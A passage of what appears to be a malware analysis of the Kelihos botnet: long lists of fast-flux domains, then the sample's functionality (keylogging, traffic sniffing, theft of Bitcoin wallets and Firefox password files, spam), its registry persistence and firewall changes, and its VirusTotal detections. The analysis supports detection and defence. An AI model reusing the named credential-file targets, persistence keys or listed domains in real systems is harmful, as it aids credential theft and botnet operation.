yhvotyf.eu
yjygtux.eu
ypvipja.eu
ypychuj.eu
yrhodyf.eu
ysfukiw.eu
yvadmap.eu
yvsuxel.eu
zakasoc.eu
zawfyev.eu
zequspu.eu
zexdaga.eu
ziqnypa.eu
zobubof.eu
zogaguj.eu
zoneczu.eu
zuzzuna.eu
zydnimy.eu
zyefhim.eu
zymidaf.eu
zyvacus.eu
frostli.com


ns[1-6].pizzebu.com
awmybak.eu
beqylhe.eu
bozopit.eu
dilecdo.eu
edkadaf.eu
ejywqem.eu
essessa.eu
etrodhy.eu
gipahco.eu
gycakus.eu
hiahnuh.eu
iqqeniv.eu
jerufuw.eu
juzagyt.eu
kareffu.eu
kufogku.eu
monedyg.eu
opgukem.eu
oxkyrir.eu
piqxoxo.eu
qofabar.eu
rivinax.eu
rybunwa.eu
seybdec.eu
suiqtat.eu
udqejyx.eu
ugdycom.eu
usmuzeq.eu
wabomiw.eu
wyylsic.eu
xulotgu.eu
ykqewyx.eu
yraxvuh.eu
zaetpop.eu
zitufon.eu
zobubof.eu
zoneczu.eu
agomdaz.eu
ahmomyx.eu
ahvorme.eu
akdygij.eu
axcinov.eu
bemewan.eu
buzgomu.eu
cikynon.eu
cirafir.eu
ciskuur.eu
cureses.eu
ezadkam.eu
fagahmo.eu
gatocut.eu
gawgulo.eu
gixseka.eu
goemqag.eu
gyhello.eu
hatahse.eu
havimpa.eu
hometxa.eu
idbizex.eu
ileqbew.eu
imarnim.eu
japonzo.eu
jobfyre.eu
kuarzoz.eu
kuletif.eu
kytyvod.eu
lelreyb.eu
lomqybi.eu
lubigne.eu
macetty.eu
mosidgu.eu
movjihi.eu
mufidis.eu
nagegal.eu
nexreza.eu
noalbej.eu
nuvyhne.eu
nuzozuf.eu
ofxawmi.eu
opybxyb.eu
owlyzgi.eu
pefzota.eu
pexigki.eu
qoanxat.eu
qonerne.eu
roqeluv.eu
rylliny.eu
taksusy.eu
tugatiq.eu
udzonek.eu
uffecuj.eu
ugsowqy.eu
uhxesap.eu
ukryxyw.eu
wigiluk.eu
xumitza.eu
xuygcut.eu
xyrpavu.eu
ydbeqes.eu
yfuqcon.eu
yfynqav.eu
yjygtux.eu
yklocgu.eu
ynpysul.eu
yrhodyf.eu
ysfukiw.eu
zanpohe.eu
zyvacus.eu










awmybak.eu
beqylhe.eu
bozopit.eu
dilecdo.eu
edkadaf.eu
ejywqem.eu
essessa.eu
etrodhy.eu
gipahco.eu
gycakus.eu
hiahnuh.eu
iqqeniv.eu
jerufuw.eu
juzagyt.eu
kareffu.eu
kufogku.eu
monedyg.eu
opgukem.eu
oxkyrir.eu
piqxoxo.eu
qofabar.eu
rivinax.eu
rybunwa.eu
seybdec.eu
suiqtat.eu
udqejyx.eu
ugdycom.eu
usmuzeq.eu
wabomiw.eu
wyylsic.eu
xulotgu.eu
ykqewyx.eu
yraxvuh.eu
zaetpop.eu
zitufon.eu
zobubof.eu
zoneczu.eu

pizzebu.com.
agomdaz.eu
ahmomyx.eu
ahvorme.eu
akdygij.eu
axcinov.eu
bemewan.eu
buzgomu.eu
cikynon.eu
cirafir.eu
ciskuur.eu
cureses.eu
ezadkam.eu
fagahmo.eu
gatocut.eu
gawgulo.eu
gixseka.eu
goemqag.eu
gyhello.eu
hatahse.eu
havimpa.eu
hometxa.eu
idbizex.eu
ileqbew.eu
imarnim.eu
japonzo.eu
jobfyre.eu
kuarzoz.eu
kuletif.eu
kytyvod.eu
lelreyb.eu
lomqybi.eu
lubigne.eu
macetty.eu
mosidgu.eu
movjihi.eu
mufidis.eu
nagegal.eu
nexreza.eu
noalbej.eu
nuvyhne.eu
nuzozuf.eu
ofxawmi.eu
opybxyb.eu
owlyzgi.eu
pefzota.eu
pexigki.eu
qoanxat.eu
qonerne.eu
roqeluv.eu
rylliny.eu
taksusy.eu
tugatiq.eu
udzonek.eu
uffecuj.eu
ugsowqy.eu
uhxesap.eu
ukryxyw.eu
wigiluk.eu
xumitza.eu
xuygcut.eu
xyrpavu.eu
ydbeqes.eu
yfuqcon.eu
yfynqav.eu
yjygtux.eu
yklocgu.eu
ynpysul.eu
yrhodyf.eu
ysfukiw.eu
zanpohe.eu
zyvacus.eu


ns[1-6]diastr.com
affuxok.ru
aglycyx.ru
agogsip.ru
ahodxil.ru
ajgufog.ru
aqcanov.ru
avondov.ru
axrohug.ru
baryqyq.ru
bixqijy.ru
bogquse.ru
borutat.ru
butawad.ru
bylviha.ru
cajuhwo.ru
cesisnu.ru
cibudit.ru
coukdyg.ru
cuhugoh.ru
cyuhtut.ru
daagtah.ru
deivwyx.ru
duebgud.ru
efdylve.ru
ehgycuj.ru
eqlasho.ru
exmotof.ru
ezirhaz.ru
fenataj.ru
fyvegom.ru
giczeca.ru
heupjeq.ru
hidafog.ru
hivagdy.ru
houktuh.ru
hugejin.ru
hyjamat.ru
iddyraq.ru
ihfajoc.ru
ixqasib.ru
jyernol.ru
kabezer.ru
kipokfy.ru
koqqeih.ru
kufdeag.ru
kulegoh.ru
kyqolby.ru
lauqpum.ru
lojseuv.ru
lojyzyt.ru
loxusyd.ru
magucjo.ru
melimma.ru
miobrav.ru
mubidpy.ru
nebirza.ru
nilwoim.ru
nimepof.ru
nougxin.ru
ojuxxub.ru
okrolyk.ru
onsenyq.ru
pesudwa.ru
pidohis.ru
pokatik.ru
pubujux.ru
qiohxuv.ru
qoqwoas.ru
qoripwe.ru
quhokle.ru
raleqle.ru
ripexru.ru
rodejuj.ru
rymyheh.ru
sidinox.ru
suvmune.ru
teuxtik.ru
tevythi.ru
titepob.ru
tobjuow.ru
togpuit.ru
tonalog.ru
tozukem.ru
tyhrypo.ru
ubbylys.ru
veoxzul.ru
vysatyv.ru
wegipij.ru
wexriyp.ru
wiewkux.ru
wyliwow.ru
xakruaq.ru
xekisuw.ru
xequjej.ru
xuzuppu.ru
xybired.ru
ygdykin.ru
ykrijyj.ru
ypemval.ru
ypyxwon.ru
yqdazyb.ru
yvnahty.ru
zaacvas.ru
zeryqiq.ru
zihemmi.ru
zuzilum.ru

ns[1-6]snapoli.com
affuxok.ru
ajgufog.ru
bogquse.ru
deivwyx.ru
duebgud.ru
exmotof.ru
ezirhaz.ru
giczeca.ru
houktuh.ru
ihfajoc.ru
jazzute.ru
kabezer.ru
kipokfy.ru
nilwoim.ru
ojuxxub.ru
okrolyk.ru
onsenyq.ru
qiohxuv.ru
qoqwoas.ru
raleqle.ru
ripexru.ru
salyqiz.ru
sidinox.ru
suvmune.ru
tobjuow.ru
tyhrypo.ru
veoxzul.ru
vysatyv.ru
wegipij.ru
xuzuppu.ru
ypemval.ru
yqdazyb.ru
yvnahty.ru
zuhycyc.ru
snapoli.com


ns[1-6].firstara.com
alnykwu.in
anhozur.in
avutguz.in
azgesaj.in
bagexev.in
bemdymu.in
beruhor.in
bydxufu.in
cutrouc.in
docxymo.in
dyemheb.in
dysjeag.in
edsahug.in
egziwof.in
ejredeg.in
eptulyk.in
esqific.in
ewnupaj.in
fybildo.in
geigbeq.in
goivgek.in
gorocez.in
havowyx.in
haywsab.in
hexdoik.in
hezypez.in
hirurgy.in
honedju.in
hotfool.in
huisfeq.in
huvygmy.in
icotkik.in
iczipyk.in
iddeste.in
igtevax.in
iksutel.in
infobyt.in
itkyguh.in
ivhapuf.in
jepokfa.in
jiifxoz.in
jiquvel.in
juzuxcy.in
kaduqec.in
kiabrok.in
kufirqe.in
kyrocok.in
legycxa.in
leqozdy.in
lexucyl.in
moropdy.in
mutywro.in
myzxozy.in
negmeuw.in
nytutiv.in
ofusqar.in
oqufnyg.in
oxetpah.in
pamywuz.in
pedezby.in
pisyhyn.in
pydilaw.in
qabojir.in
qifufuk.in
raehxez.in
riwgagi.in
rufabex.in
seazdel.in
seompis.in
sinuheh.in
talutyw.in
tarraso.in
tivenyr.in
ucfensa.in
ufbofky.in
ufhewuk.in
ujjukag.in
uqtopik.in
urxiwat.in
uwhepij.in
veqyhli.in
vezkoty.in
vugozan.in
vuqfuek.in
wasidxo.in
wynzobo.in
wyvloiq.in
xategon.in
xevezby.in
xutepyj.in
xuwigir.in
yxfibet.in
yzrefyf.in
zaxseyz.in
zilziom.in
zohdoud.in
zunipaw.in
zynacha.in
firstara.com


roblect.com
akzruyh.ce.ms
apeefoacx.ce.ms
ezoglolbj.ce.ms
gcbjbamdj.ce.ms
geljoxlkd.ce.ms
himukcnen.ce.ms
hyyviccku.ce.ms
imoqjzsej.ce.ms
ljltpaffv.ce.ms
lrjvgjwmg.ce.ms
lvfksyqmz.ce.ms
mhfrhelfr.ce.ms
mkiplkooq.ce.ms
nlozaydyk.ce.ms
ouxwexphh.ce.ms
rxhndcxxi.ce.ms
shuxkzjvp.ce.ms
dlmdlemqjw.ce.ms
roblect.com


galloma.com
ajyxxun.ce.ms
avtjicn.ce.ms
bbzulty.ce.ms
bhueizz.ce.ms
bmxnbbz.ce.ms
bzzqkjk.ce.ms
cluuocw.ce.ms
cqkjibj.ce.ms
dixrkno.ce.ms
dkwhwqc.ce.ms
eymosvc.ce.ms
ezwrvsq.ce.ms
fautuzh.ce.ms
fbxmkgs.ce.ms
gnrmdds.ce.ms
hvhlazq.ce.ms
iygxhfq.ce.ms
jddpvzw.ce.ms
jejmqny.ce.ms
jlruxuf.ce.ms
jqqvqnv.ce.ms
jvhqpyj.ce.ms
ldntbtg.ce.ms
lkddqig.ce.ms
miulvnp.ce.ms
neitfvf.ce.ms
norwdyd.ce.ms
obsnkwx.ce.ms
oqylgfb.ce.ms
pyxthzm.ce.ms
qbdptev.ce.ms
rkzdnlm.ce.ms
rrfrahh.ce.ms
saogsek.ce.ms
sqwdoei.ce.ms
tazaopm.ce.ms
tyldrgy.ce.ms
ujbtapn.ce.ms
uvqyfnd.ce.ms
vwtnddd.ce.ms
wfbanyv.ce.ms
wukiuxb.ce.ms
wxatkfz.ce.ms
xalagnq.ce.ms
yvfeyyn.ce.ms
zhmeqqs.ce.ms
aadsfqle.ce.ms
aahoqmie.ce.ms
adokxrbx.ce.ms
adpiisyi.ce.ms
azyvxiqw.ce.ms
bwwrudue.ce.ms
ccybfonk.ce.ms
dlylxoca.ce.ms
dplvoghe.ce.ms
egezeqki.ce.ms
fjjlnqdt.ce.ms
flgsajeb.ce.ms
fonpxxvd.ce.ms
gwlgkror.ce.ms
gwtowtjz.ce.ms
hezfpxvr.ce.ms
iesathjc.ce.ms
iigijrqo.ce.ms
ijcyicbj.ce.ms
iupyrwes.ce.ms
kzomxpkx.ce.ms
ltaqntzd.ce.ms
ltjohroy.ce.ms
mhivnltw.ce.ms
nanxawdp.ce.ms
nhdoyayw.ce.ms
nktxmecg.ce.ms
nucmqeml.ce.ms
ogmoupcf.ce.ms
pdmhojaf.ce.ms
phlmdkkg.ce.ms
ptufrgou.ce.ms
pwhwhatr.ce.ms
qgewkpxr.ce.ms
raqdiqwr.ce.ms
reoawbqz.ce.ms
sigafisv.ce.ms
spdyccmi.ce.ms
srqdtssc.ce.ms
tfxjtthw.ce.ms
tlzfdnjv.ce.ms
twszglot.ce.ms
ulpgjmhh.ce.ms
vcrlyfcm.ce.ms
viamftgu.ce.ms
vinlgixi.ce.ms
vlyhbwqp.ce.ms
vvmqwzjd.ce.ms
wanolzyh.ce.ms
wcvlwcqz.ce.ms
wocsgoku.ce.ms
wrtetrxh.ce.ms
xacnagya.ce.ms
xbpfgoob.ce.ms
xyzrriwp.ce.ms
yclrslbn.ce.ms
yfonzetf.ce.ms
zdzmkdll.ce.ms
znfxgwwr.ce.ms
aanhryihh.ce.ms
amwthlqru.ce.ms
axikehkes.ce.ms
axrgpgnay.ce.ms
bqtvpxibn.ce.ms
bsaqfqzof.ce.ms
bugtjtgwx.ce.ms
cmuvcunas.ce.ms
cqszgtvxd.ce.ms
cwpdeuvmo.ce.ms
desajkhtt.ce.ms
dgxdydvqu.ce.ms
dhmykycap.ce.ms
djgkxulbq.ce.ms
dldbiwlib.ce.ms
dmmwbnmba.ce.ms
ebeecytff.ce.ms
eehxpgnfa.ce.ms
elvliioxz.ce.ms
ewqvmeirc.ce.ms
festcfwmb.ce.ms
fnmqkvqhc.ce.ms
fnwqxoaqd.ce.ms
gjfqabqzs.ce.ms
gkqssznth.ce.ms
glfvlbsqy.ce.ms
godlblffu.ce.ms
gxvkuefqy.ce.ms
gzwynxrdz.ce.ms
hagduqcbi.ce.ms
hbddtiimz.ce.ms
hjutzoytz.ce.ms
hpuurfkft.ce.ms
hrrdabsgc.ce.ms
hvcsfnnbl.ce.ms
hxnvbogua.ce.ms
ibhmbiujp.ce.ms
ibnrnrsca.ce.ms
ihtxwgrri.ce.ms
ikbpsegqa.ce.ms
imozsewyo.ce.ms
inyqjraby.ce.ms
iqwkvaleh.ce.ms
iqxflmwpo.ce.ms
ivejampkn.ce.ms
jhzzwrnnv.ce.ms
jkmxhwjzd.ce.ms
jmjnguloo.ce.ms
jovrpwfks.ce.ms
jrctenbni.ce.ms
khnzohexi.ce.ms
klkzahmar.ce.ms
kogqvmbyl.ce.ms
ldgtxgznq.ce.ms
ldzjcvqai.ce.ms
liowklchs.ce.ms
lqvncgwsu.ce.ms
mffhjjuyo.ce.ms
mhiyegpwm.ce.ms
mpnfrtxkb.ce.ms
mxzhmcyus.ce.ms
nbgatlklr.ce.ms
ncqpfwapp.ce.ms
nrsxuxxjk.ce.ms
nzaqohego.ce.ms
ofzdzqhgs.ce.ms
oknstngdx.ce.ms
ooiebkatd.ce.ms
oowkipkpf.ce.ms
ortshbpzv.ce.ms
oueaegkkt.ce.ms
owhhnjtvt.ce.ms
pbxyhsjcl.ce.ms
phttlfxnv.ce.ms
pnsohrgpm.ce.ms
pqqhqklih.ce.ms
qngclqeln.ce.ms
qxztybniy.ce.ms
rdmhzrzab.ce.ms
rllwnboym.ce.ms
rvbkzpsls.ce.ms
rypwddplv.ce.ms
rytfgngkw.ce.ms
sbealjyie.ce.ms
sbryweuao.ce.ms
sdgokmpmp.ce.ms
sfkgvnqll.ce.ms
shhgcqijh.ce.ms
shkrbmwiq.ce.ms
sikoastac.ce.ms
soabvshxw.ce.ms
srcfkmvtz.ce.ms
sstmzbmvc.ce.ms
szdigkjog.ce.ms
thchbcfsr.ce.ms
thxvwlnst.ce.ms
udprbpncg.ce.ms
uiniyiwze.ce.ms
upsbjrgpy.ce.ms
upthfdgon.ce.ms
uuybeevvw.ce.ms
vexojepsn.ce.ms
vojehftlt.ce.ms
vwhbcowxu.ce.ms
vwvabbujm.ce.ms
wodutsrzu.ce.ms
wyfhzlmkw.ce.ms
wzyxueqhy.ce.ms
xbaxsnihc.ce.ms
ygmehzjlg.ce.ms
yorzhrizg.ce.ms
ypflxjlzo.ce.ms
zlkaimpeq.ce.ms
ztngnmmib.ce.ms
zxtvqkftz.ce.ms
aknmlvkeho.ce.ms
apiuxcoauy.ce.ms
buygunnsnw.ce.ms
cblfdefxmf.ce.ms
cmbwsssnlo.ce.ms
cwoomqxtjo.ce.ms
dohnebpdrp.ce.ms
dyioatrhnx.ce.ms
eqqtdwbnwg.ce.ms
eyeamccxvb.ce.ms
hlmewfctuc.ce.ms
iqqspkqdji.ce.ms
jjyzwvufmb.ce.ms
jsgecgfnrw.ce.ms
kvmchjinmu.ce.ms
lglqkkqybq.ce.ms
lqsyddcoot.ce.ms
lvscrnzqzm.ce.ms
mgxstzpxfv.ce.ms
nflmyecafv.ce.ms
nmwhryeybz.ce.ms
noilnvnsie.ce.ms
nuyzxhxyqn.ce.ms
oixtvfudyd.ce.ms
pnfyoidgkn.ce.ms
pnsntpjnhw.ce.ms
pvfnpwoyjq.ce.ms
pxafmmglnp.ce.ms
qdmxpqpkbk.ce.ms
razocjpywj.ce.ms
rcmtvlzbuk.ce.ms
rljgnvkghq.ce.ms
rlybfffajb.ce.ms
rybrueryce.ce.ms
sokhxokonz.ce.ms
spuiygpbcr.ce.ms
sweaxoedyw.ce.ms
sygsgahycs.ce.ms
tepbzktaqg.ce.ms
uupkufucmx.ce.ms
vcoewypubi.ce.ms
xerrwvuuzb.ce.ms
xhmqllyufj.ce.ms
xmfydbnjgq.ce.ms
ydokioxqpc.ce.ms
yefwipbiih.ce.ms
ysjeguxpmt.ce.ms


These are lists of IPs that ns1.boomsco.com (created 2013-01-13) and ns1.larstor.com (created 2012-12-22) were pointing to since their creation.  The lists show how fast the ips change - more than 9,000 times over 30-45 days. There are many infected hosts but it does not mean that every host in the list was infected. Some IPs only were used for a second, which also demonstrates the evasive nature of the fast flux.
http://files.deependresearch.org/logs/boomsco_asn.txt
http://files.deependresearch.org/logs/larstor_asn.txt


Malware functionality and system changes.
Based on 0C921935F0880B5C2161B3905F8A3069 - active fresh sample, first seen by Virus 2013-02-06, PE date stamp 2011-30-10.


We also analyzed fresh samples with 2013 PE date stamps and observed same / similar functionality (some lack some features like Firefox or FTP password stealing or while others have the full set).  Compared to Dec. 2012 post by abuse.ch, the overall functionality did not change much. 



Functionality:

  • Installs winpcap and monitors traffic
  • Keylogging capabilities 
    see SetWindowsHookExW - in KERNEL32.dll imports
C:\Documents and Settings\\Application Data\Bitcoin\wallet.dat
  • Parses Firefox's Password Manager Local Database in order to steal stored passwords: Firefox stores password data in two files: key3.db (Master Password / Encryption key) and a 'signons' file (encrypted names and passwords). Reads:
--%USERPROFILE%\Application Data\Mozilla\Firefox\Profiles\[xxxxxx].default\signons.sqlite
--%USERPROFILE%\Application Data\Mozilla\Firefox\Profiles\[xxxxxx].default\signons.sqlite
--%USERPROFILE%\Application Data\Mozilla\Firefox\Profiles\[xxxxxx].default\key3.db
--%USERPROFILE%\[username]\Application Data\Mozilla\Firefox\Profiles\[xxxxxx].default\key3.db
See SQL related imports in ODBCJT32.dll
SQLGetCursorNameW
SQLFreeStmt
SQLGetConnectAttrW
ConfigDialogProc
SQLSetCursorNameW
SQLSetStmtAttrW
SQLFreeConnect
SQLCloseCursor
DefTxtFmtDlgProc
SQLSetConnectAttrW
SQLColumnsW
SQLDisconnect
SQLDriverConnectW
SQLTablesW
SQLGetDiagFieldW
SQLBulkOperations
SQLSetPos
SQLFreeHandle
SQLSetDescFieldW
SQLNumResultCols
SQLConnectW
SQLExecute
SQLProcedureColumnsW
SQLFetch
 
  • Sends spam
iMimeMessageTree api calls: iMimeMessageTree parses and creates Internet messages. IMimeMessageTree treats a message as a tree of bodies where each body has a header and associated content. It gives a client the most flexible, low-level access to a message. Read more MimeMessageTree Interface http://msdn.microsoft.com/en-us/library/ms711715(v=vs.85).aspx
imports from INETCOMM.dll
MimeOleSMimeCapAddCert
MimeEditIsSafeToRun
MimeOleUnEscapeStringInPlace
EssSignCertificateDecodeEx
etc.

User Agents used (hardcoded in binaries), you can see in memory dumps or after unpacking
  1. Mozilla/5.0 (Windows; U; Windows NT 6.1; ja; rv:1.9.2a1pre) Gecko/20090403 Firefox/3.6a1pre
  2. Mozilla/5.0 (X11; U; Linux x86_64; cy; rv:1.9.1b3) Gecko/20090327 Fedora/3.1-0.11.beta3.fc11 Firefox/3.1b3
  3. Mozilla/5.0 (Windows; U; Windows NT 5.1; es-AR; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11
  4. Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6 ; nl; rv:1.9) Gecko/2008051206 Firefox/3.0
  5. Mozilla/5.0 (Windows; U; Windows NT 6.1; es-AR; rv:1.9) Gecko/2008051206 Firefox/3.0
  6. Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15
  7. Mozilla/5.0 (Windows; U; Windows NT 6.0; zh-HK; rv:1.8.1.7) Gecko Firefox/2.0
  8. Mozilla/5.0 (Windows; U; Win95; it; rv:1.8.1) Gecko/20061010 Firefox/2.0
  9. Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
  10. Mozilla/5.0 (ZX-81; U; CP/M86; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
  11. Mozilla/5.0 (X11; U; NetBSD alpha; en-US; rv:1.8) Gecko/20060107 Firefox/1.5
  12. Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8b5) Gecko/20051006 Firefox/1.4.1
  13. Mozilla/5.0 (X11; I; SunOS sun4u; en-GB; rv:1.7.8) Gecko/20050713 Firefox/1.0.4
  14. Mozilla/5.0 (X11; U; Linux i686; de-AT; rv:1.7.5) Gecko/20041222 Firefox/1.0 (Debian package 1.0-4)
  15. Mozilla/5.0 (Windows; U; Win 9x 4.90; rv:1.7) Gecko/20041103 Firefox/0.9.3
  16. Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; fr; rv:1.7) Gecko/20040624 Firefox/0.9
  17. Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)
  18. Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET CLR 1.1.4322; Tablet PC 2.0; OfficeLiveConnector.1.3; OfficeLivePatch.1.3; MS-RTC LM 8; InfoPath.3)
  19. Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 3.5.21022)
  20. Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)
  21. Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; x64; SV1)
  22. Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
  23. Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
  24. Mozilla/4.0 (compatible; MSIE 5.5; Windows 95)
  25. Mozilla/4.0 (compatible; MSIE 4.01; Windows NT 5.0)
  26. Mozilla/2.0 (compatible; MSIE 3.0; Windows 3.1)
  27. Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)
  28. Microsoft Internet Explorer/1.0 (Windows 95)
System Changes
  • Sets to load when Windows is started
MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
    Changes Internet Explorer's default home page
HKU\S-1-5-21-1715567821-1275210071-839522115-1004\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\UserPlayedActive: "DIhnDzXVnPDA+DO4Z72Q5BeL4OTOAPYBa9ef262UWrJ7soV07MpOXsWicda8NBA0tg=="
  • Makes Windows firewall changes:
HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\80:TCP: "80:TCP:*:Enabled:Promo"
HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\53:UDP: "53:UDP:*:Enabled:Promo"
  • Service created SERVICES\NPF (winpcap service) WinPcap Packet Driver (NPF)
  • The original  copied to
    C:\WINDOWS\Temp\temp18.exe
    C:\WINDOWS\Temp\kb778817.exe -- deleted
    C:\WINDOWS\Temp\tmp.exe -- deleted

Virustotal results of 0c921935f0880b5c2161b3905f8a3069

SHA256: 55885d1928d39600ce3d99617072bf3632db94352fed8032bc3dce3afe665740
SHA1: 05ca64ccfa582e7787d0238f82336a079aba8419
MD5: 0c921935f0880b5c2161b3905f8a3069
File size: 62.5 KB ( 64036 bytes )
File type: Win32 EXE
Tags: peexe
Detection ratio: 23 / 46
Analysis date: 2013-02-06 20:08:42 UTC ( 4 days, 2 hours ago )
Agnitum Trojan.PWS.Tepfer!CPwnyKhdTDg 20130206
AhnLab-V3 Downloader/Win32.Agent 20130206
AntiVir TR/Crypt.XPACK.Gen2 20130206
Avast Win32:Dropper-gen [Drp] 20130206
AVG Win32/Cryptor 20130206
BitDefender Gen:Variant.Kazy.137742 20130206
Comodo TrojWare.Win32.Kryptik.ASEW 20130206
DrWeb Trojan.DownLoader6.380 20130206
ESET-NOD32 a variant of Win32/Kryptik.ASFO 20130206
F-Secure Gen:Variant.Kazy.137742 20130206
Fortinet W32/Kryptik.XUW!tr 20130206
GData Gen:Variant.Kazy.137742 20130206
Ikarus Trojan-PWS.Win32.Tepfer 20130206
Kaspersky Trojan-PSW.Win32.Tepfer.emee 20130206
Kingsoft Win32.Troj.Generic.a.(kcloud) 20130204
McAfee Artemis!0C921935F088 20130206
McAfee-GW-Edition Artemis!0C921935F088 20130206
MicroWorld-eScan Gen:Variant.Kazy.137742 20130206
NANO-Antivirus Trojan.Win32.Kryptik.bevkem 20130206
Norman Kelihos.DA 20130206
Panda Suspicious file 20130206
VBA32 SScope.Trojan.SB.01722 20130206
VIPRE Trojan.Win32.Generic!BT 20130206